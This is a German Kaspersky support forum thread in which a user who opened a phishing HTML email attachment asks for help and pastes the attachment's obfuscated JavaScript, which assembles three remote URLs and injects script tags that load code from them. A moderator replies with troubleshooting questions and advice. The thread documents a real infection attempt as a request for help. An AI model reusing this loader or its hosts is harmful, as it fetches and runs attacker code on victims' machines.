Jump to content
Kaspersky Support Forum

Email Anhang HTML Malware ?

Nullchecker

By Nullchecker
in Für Privatanwender

 Share

Recommended Posts

Nullchecker

Nullchecker

Posted
Posted

Hallo Leute

wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.

Bedauerlicherweise hat Kaspersky nicht angeschlagen.

Diesre Code läd von 3 Servern dateien nach. Wird Kaspersky dies verhindern?

Wie werde ich den Mist wieder los.

Hier der Code

<script type="text/javascript">
 
var a0gaxemmamnmai=a0auopbttselaeva;(function(paltvonousn,molssurosiumdpo){var aqsupimi=a0auopbttselaeva,lnpmaguiac=paltvonousn();while(!![]){try{var uaamumatquindlail=parseInt(aqsupimi(0xc8))/0x1*(parseInt(aqsupimi(0xc7))/0x2)+parseInt(aqsupimi(0xc3))/0x3+parseInt(aqsupimi(0xc1))/0x4+-parseInt(aqsupimi(0xc6))/0x5+-parseInt(aqsupimi(0xc4))/0x6+-parseInt(aqsupimi(0xbf))/0x7*(-parseInt(aqsupimi(0xc5))/0x8)+-parseInt(aqsupimi(0xcf))/0x9;if(uaamumatquindlail===molssurosiumdpo)break;else lnpmaguiac['push'](lnpmaguiac['shift']());}catch(sdasenectuear){lnpmaguiac['push'](lnpmaguiac['shift']());}}}(a0pcuisssitint,0x9c462));function a0auopbttselaeva(pcuisssitint,auopbttselaeva){var paltvonousn=a0pcuisssitint();return a0auopbttselaeva=function(molssurosiumdpo,lnpmaguiac){molssurosiumdpo=molssurosiumdpo-0xbd;var uaamumatquindlail=paltvonousn[molssurosiumdpo];return uaamumatquindlail;},a0auopbttselaeva(pcuisssitint,auopbttselaeva);}var voluptatemrerum=[a0gaxemmamnmai(0xc2)+'nseg.com/qu/qu'+a0gaxemmamnmai(0xcc),'https://ksaa-e'+a0gaxemmamnmai(0xbe)+a0gaxemmamnmai(0xbd)+'2',a0gaxemmamnmai(0xd1)+a0gaxemmamnmai(0xca)+a0gaxemmamnmai(0xcd)+a0gaxemmamnmai(0xc0)+'5111'];function a0pcuisssitint(){var tboeurldsoi=['osscommunicati','appendChild','.php?14652','onservices.com','script','8538543FFQfSE','createElement','https://youngb','/enqu.php?2954','vents.com/enqu','8781570gbVRZg','/aua/aua.php?3','4856144NrAgbj','https://horizo','387975mYIIKZ','2511780PInbUf','8XBKhBs','6018945WNxSPK','12146zVqPWt','101AYDIcr','src'];a0pcuisssitint=function(){return tboeurldsoi;};return a0pcuisssitint();}for(var occaecatiestnesciunt in voluptatemrerum){var rem=document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));rem[a0gaxemmamnmai(0xc9)]=voluptatemrerum[occaecatiestnesciunt],document['head'][a0gaxemmamnmai(0xcb)](rem);}
</script>
Link to comment
Share on other sites
Schulte

Schulte

Posted
Posted

Hallo @Nullchecker, willkommen.

In einem anderen Forum hast Du ja bereits einige Hinweise erhalten.

Die wichtigste Frage wurde dort allerdings nicht gestellt:
welches Mailprogramm verwendest Du, ist die HTML-Ansicht und die Ausführung von Scripts erlaubt?
Mit anderen Worten: wäre das Nachladen des externen Scripts möglich gewesen?

Link to comment
Share on other sites
Schulte

Schulte

Posted
Posted

Hi @Nullchecker,

gehen wir mal vom bestmöglichen Fall aus: TB oder Kaspersky haben das Script blockiert und es ist nichts passiert.
Eventuell findest Du etwas in den Kaspersky-Logs, blockierte Downloads werden in der Regel vermerkt.

Mir fehlt leider gerade die Zeit, das Script aufzudröseln. Auch die URL-Fragmente geben keinen Hinweis, die wahre URL wird erst zur Laufzeit mit Hilfe der unleserlich gemachten Funktionen erstellt.

Um sicherzugehen kannst Du Dich gerne an den Support wenden. Dieser fordert dann ein GSI-Log an (dürfen wir nicht), in dem nahezu jede Malware erkennbar ist.

Link to comment
Share on other sites

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
 Share
Go to topic listing


×
×
  • Create New...